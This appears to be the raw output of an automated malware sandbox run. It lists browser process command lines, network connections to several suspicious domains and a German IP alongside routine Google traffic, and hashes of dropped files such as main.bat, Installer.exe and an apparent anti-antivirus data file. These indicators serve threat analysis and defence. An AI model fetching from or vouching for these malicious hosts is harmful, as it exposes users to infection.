"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x27c
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | completedhallweow.xyz | udp |
| US | 8.8.8.8:53 | bouncedgowp.shop | udp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 8.8.8.8:53 | 198.93.21.104.in-addr.arpa | udp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| US | 104.21.93.198:443 | bouncedgowp.shop | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 81.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.213.58.216.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.201.102:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| GB | 216.58.212.234:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| GB | 172.217.169.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 102.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.187.206:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.187.206:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | rr2---sn-aigzrnz7.googlevideo.com | udp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | tcp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-5hneknes.googlevideo.com | udp |
| NL | 74.125.8.202:443 | rr5---sn-5hneknes.googlevideo.com | udp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 84.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i9.ytimg.com | udp |
| GB | 216.58.204.78:443 | i9.ytimg.com | tcp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 216.58.201.110:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | tcp |
| GB | 74.125.175.199:443 | rr2---sn-aigzrnz7.googlevideo.com | udp |
| NL | 52.142.223.178:80 | tcp | |
| GB | 216.58.201.102:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | 84.162.74.23.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | consent.youtube.com | udp |
| GB | 142.250.187.193:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 104.17.112.233:443 | tinyurl.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 233.112.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| US | 104.16.113.74:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| GB | 18.154.84.20:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.113.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.84.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 54.203.54.100:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| IT | 157.240.203.2:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.169.78:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | tcp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| IT | 157.240.203.2:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 100.54.203.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.203.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.71.125.74.in-addr.arpa | udp |
| GB | 172.217.16.227:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| IT | 157.240.203.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 35.203.240.157.in-addr.arpa | udp |
| GB | 142.250.200.42:443 | udp |
Files
memory/5104-5-0x00000000012D0000-0x0000000001326000-memory.dmp
memory/5104-8-0x00000000012D0000-0x0000000001326000-memory.dmp
memory/4180-7-0x00007FF7E0330000-0x00007FF7E0E5D000-memory.dmp
memory/5104-10-0x00000000012D0000-0x0000000001326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
| MD5 | b2e6a3d0bf3320b759c464ae6fa5b735 |
| SHA1 | cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1 |
| SHA256 | 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3 |
| SHA512 | bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a |
memory/5104-15-0x00000000012D0000-0x0000000001326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 893874465a8d9f68f0684fd61e9f1d3c |
| SHA1 | 866a58255ebab05d4ee2f2ed8383a6555ac1df03 |
| SHA256 | e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0 |
| SHA512 | 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7 |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 716459a6ceac7d310d4227ea3e9ddb59 |
| SHA1 | fa27addf18c197bf5fc054bfb5ae57de1caf3382 |
| SHA256 | ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1 |
| SHA512 | 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1 |
\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | a62944686498212b290eae637729a151 |
| SHA1 | 2053660850d3f578f7b31e5ced16069d6f9c4ee0 |
| SHA256 | 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e |
| SHA512 | ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | 870a5535c79edcf782551514f48d89ab |
| SHA1 | 333d814d65753cdc4c4e8fb587c09af6960110d1 |
| SHA256 | 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d |
| SHA512 | f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 6f7f4f7ed739e3ac5eee8d0876ff76d4 |
| SHA1 | 9a65d52885624dc47f342b5a9875d7720540c755 |
| SHA256 | b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc |
| SHA512 | 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 4a5f569872c858ede1c0c67500cfdd6d |
| SHA1 | cdcac69d89b45a7903198467c2d2d32126c31661 |
| SHA256 | 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc |
| SHA512 | d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | a915fd2a4e2750ee9003e628294bf284 |
| SHA1 | f9adc1e65fc3d2cf39b2c5a89030f3225e21616d |
| SHA256 | 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285 |
| SHA512 | 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 18f4fe969c4ba0517b403e28f7ad2b72 |
| SHA1 | 9df09751ee1246db2ed6b6ed6fec87fb0891e077 |
| SHA256 | 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4 |
| SHA512 | 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
| MD5 | 4265bf9f9535ebb4e1830e2a50589285 |
| SHA1 | ddc45fe277a3b39179dd9e39e17d71b50a184607 |
| SHA256 | c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403 |
| SHA512 | 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 6dd7f70cddc4310e047032d70550f72c |
| SHA1 | e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562 |
| SHA256 | e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d |
| SHA512 | 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c |
memory/868-77-0x0000000000240000-0x000000000024C000-memory.dmp
memory/868-78-0x0000000005040000-0x000000000553E000-memory.dmp
memory/868-79-0x0000000004A90000-0x0000000004B22000-memory.dmp
memory/868-80-0x0000000004C10000-0x0000000004C1A000-memory.dmp
memory/868-81-0x0000000004CB0000-0x0000000004D16000-memory.dmp
memory/1192-84-0x0000000004970000-0x00000000049A6000-memory.dmp
memory/1192-85-0x00000000074E0000-0x0000000007B08000-memory.dmp
memory/1192-86-0x00000000073E0000-0x0000000007402000-memory.dmp
memory/1192-87-0x0000000007CF0000-0x0000000007D56000-memory.dmp
memory/1192-88-0x0000000007DD0000-0x0000000008120000-memory.dmp
memory/1192-89-0x0000000007BD0000-0x0000000007BEC000-memory.dmp
memory/1192-90-0x0000000008520000-0x000000000856B000-memory.dmp
memory/1192-91-0x00000000085F0000-0x0000000008666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybfkvbxl.3bg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1192-108-0x00000000095B0000-0x00000000095E3000-memory.dmp
memory/1192-109-0x000000006F740000-0x000000006F78B000-memory.dmp
memory/1192-110-0x0000000009350000-0x000000000936E000-memory.dmp
memory/1192-115-0x0000000009790000-0x0000000009835000-memory.dmp
memory/1192-116-0x00000000098E0000-0x0000000009974000-memory.dmp
memory/1192-312-0x0000000009840000-0x000000000985A000-memory.dmp
memory/1192-317-0x0000000009670000-0x0000000009678000-memory.dmp
\??\pipe\crashpad_4332_UOQZPMJYURYHESBT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | dba47117e58a4c95f60a693acfcd81d6 |
| SHA1 | 1325a6e27ab2409ef24795c0e9bb777e8a05d044 |
| SHA256 | 07fbb63934cc4eec4864b87029864c95298fcb35d017ac49e488585dff2b3bc5 |
| SHA512 | e6f7b71da72f71893bf590d43325078dbcfa202b6959a46fdfd933614ac4639af0bfb12d9859a684d82a753636b6dc9a546c47a3af4ff512ec08f5f83086e749 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2269e6fb00d925f9b840301637d32b71 |
| SHA1 | 02a04bd01cdd665982dc266aad21016fb647e27f |
| SHA256 | 360baaaa33627edf06eb04cc009fa056125214993426aeeb5dc51328e023c54b |
| SHA512 | ea0b786f55f3733fef98ae2d71280001b1eb4827c0884e37ea6ac3a6def3d083df2568e0dbaa3e3b51f4da30eef8b1a8bfd9ba70ec5a8bec2f2ab1502024194d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 63864ed43e5004147163ad1f5c1701f6 |
| SHA1 | 13d50dea98eca9481f4dacb518e8a8157a9f1c2a |
| SHA256 | 3fd036346ceff5464fa87948ab306d966f2ebae9f70f06d662f374b73c7fa9cc |
| SHA512 | 8db95e08010e03248914d2de7a906767b37711bd4af83c0969a0e5137d2fffb0cdfa97bf6867e769e4eb526cff82e4ae03c72e6ae117cd4711e6e2b88067dda0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 20f101bc2c6bc41e8f91fe5278c4056e |
| SHA1 | 546b4b194448147cc711b668ed969a211b3e675e |
| SHA256 | 7a617d4e4a0d9560cfd9e88bbda0f745d1a6a4b97b5ad18f0bd86ecc40958e9a |
| SHA512 | dc79f749d57f3c2ee13ba680564fab29fb97ee85930a38db31f19bade08efe0f881695be69be40af224c4d91418aeadeb2ec977b662e40f514c6a01e55293ec6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 452b01aa9ffd717677accf05f8ae5528 |
| SHA1 | 5db1aa50894c7a16c638ab796031bd17d2dbe7fe |
| SHA256 | 2195dd236c5b9ed6ca06fa47ae0cb39a403a30663c8ad1735e60b4cbab8fbb62 |
| SHA512 | 177d66e0e2e88ca26d0ba91fdb7e45adc498b6177d1d8ea6e9d4f7062b963a1b9de6ec0ba3026eace8f3f423249aa3b3b114c873b16bb343f8af9e8ef5f51bd8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | acf07e6e6c18c7c3e0d1f3a444063acd |
| SHA1 | 83ca2e991993f8d5481cb8f864d10a6d5fab42a5 |
| SHA256 | 14e9b05bbebe5a161c524fce5312e7ab4cc22bd664b9bd63087c138c75927492 |
| SHA512 | 99c448d70ac5185970ec25eb00cfced17f53f8b2ad0a5bf22eee7cdfe93085b0123946f4e0bc6d6e18f4230b78361dc158c65a1c49252a72407b1f06450ebb8b |
C:\Users\Admin\Downloads\Unconfirmed 378584.crdownload
| MD5 | f1320bd826092e99fcec85cc96a29791 |
| SHA1 | c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed |
| SHA256 | ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba |
